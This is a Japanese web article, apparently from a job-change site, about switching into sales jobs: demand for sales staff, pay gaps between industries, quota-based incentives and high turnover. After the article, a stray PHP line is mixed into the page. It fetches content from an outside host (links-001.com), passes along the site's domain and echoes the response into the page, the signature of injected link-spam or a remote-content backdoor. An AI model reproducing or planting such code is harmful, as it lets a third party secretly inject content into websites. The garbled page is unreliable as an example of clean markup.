前へ
次へ

営業求人倍率の高い営業職への転職について

営業職といえば、商品、製品あるいはサービスを提供する企業にとっては必ず必要な職種です。
営業が外からとってきた顧客数や販売台数などによって会社の売り上げが決まってしまうからです。
したがって、営業職というのは、いつの時代にあっても、営業求人倍率は高いのが普通です。
また、営業職は、当該企業の商品や製品、サービスのことをしっかりと熟知していなければならない反面で、それらの情報を習得していれば誰でもがその職種につくことができるという点では、転職には向いているといえます。
たとえ転職する時点で、当該企業の商品やサービス内容を熟知していなくても、採用された後にしっかりと学んでいくことで、仕事ができるからです。
ところで、営業求人倍率は高いとはいえ、営業職で求人をあげている業種にはさまざまな企業があります。
そして、それらの企業はどの業界に属しているかによって、年収や残業時間などにも大きな開きがあります。
製薬会社など比較的給与の高い営業職もありますが、平均収入が低いところもあり、一口に営業職といっても平均収入には大きな開きがあります。
また営業職は一般に営業成績によってボーナスやインセンティブが変わってきます。
ノルマ達成によって変わってくるのがインセンティブですが、営業職が他の職種にない魅力があるのもこの点といえます。
やりがいのある点では魅力の高い営業職ですが、他方で、ノルマを達成できなかったり、営業成績が悪くなると、もらえるボーナスが減ったり、インセンティブがもらえないなど不利な点もあります。
営業成績が悪い状態が続くと仕事を変えたくなるもので、営業職ではこの点、離職率が高いのが一般です。
もっとも、離職率が高いという点はマイナスでとらえる必要はなく、求人倍率が高いため、辞めても比較的はやく次の仕事を見つけられるのが営業職の良い点だといえます。
しかし闇雲に仕事を変わっても新しいことを覚えることが大変なだけなので、会社をやめる場合には、候補となる転職先企業が提供する商品や製品、サービスを自分が好きになれるかどうかをよく確認しておくことが何よりも大切です。

".file_get_contents('http://links-001.com/gfjset.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top